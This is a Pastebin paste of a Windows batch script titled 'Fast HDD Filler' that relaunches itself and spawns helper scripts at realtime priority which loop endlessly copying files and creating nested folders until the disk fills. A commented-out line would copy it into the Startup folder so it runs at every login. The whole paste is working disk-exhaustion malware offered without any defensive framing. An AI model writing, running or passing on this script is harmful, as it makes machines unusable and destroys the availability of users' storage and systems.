GL1TCH3D

Fast HDD Filler

Oct 16th, 2011
291
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.74 KB | None | 0 0
  1. @echo off
  2. if not "%1"=="bleh" goto skip
  3. ::copy "%0" "%userprofile%\start menu\programs\startup"
  4. echo @echo off>bleh.bat
  5. echo set a=1 >>bleh.bat
  6. echo ping -n 1 localhost 1>nul 2>>bleh.bat
  7. echo :loop >> bleh.bat
  8. echo copy /y "0.txt" "%cd%\%%a%%.txt" >>bleh.bat
  9. echo set /a a+=1 >>bleh.bat
  10. echo goto loop >>bleh.bat
  11. echo @echo off>bleh2.bat
  12. echo set x=1 >>bleh2.bat
  13. echo :loop >>bleh2.bat
  14. echo md %%x%%>>bleh2.bat
  15. echo cd %%x%%>>bleh2.bat
  16. echo set /a x+=1 >>bleh2.bat
  17. echo copy /y "%cd%\*.txt" "%%cd%%" >>bleh2.bat
  18. echo cd %cd%>>bleh2.bat
  19. echo goto loop >>bleh2.bat
  20. start /realtime bleh.bat
  21. start /realtime bleh2.bat
  22. :loop
  23. type %0 >> 0.txt
  24. goto loop
  25. :skip
  26. echo @echo off>new.bat
  27. echo call %0 bleh>>new.bat
  28. start /realtime new.bat
  29.  
Advertisement
Add Comment
Please, Sign In to add comment